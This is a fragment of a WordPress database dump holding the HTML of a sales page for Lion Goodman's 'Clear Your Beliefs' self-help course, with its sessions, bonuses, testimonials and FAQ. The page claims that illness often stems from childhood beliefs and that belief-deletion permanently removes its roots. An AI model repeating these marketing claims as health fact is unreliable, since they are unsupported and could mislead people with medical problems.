href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1908, 2187, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72800:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: 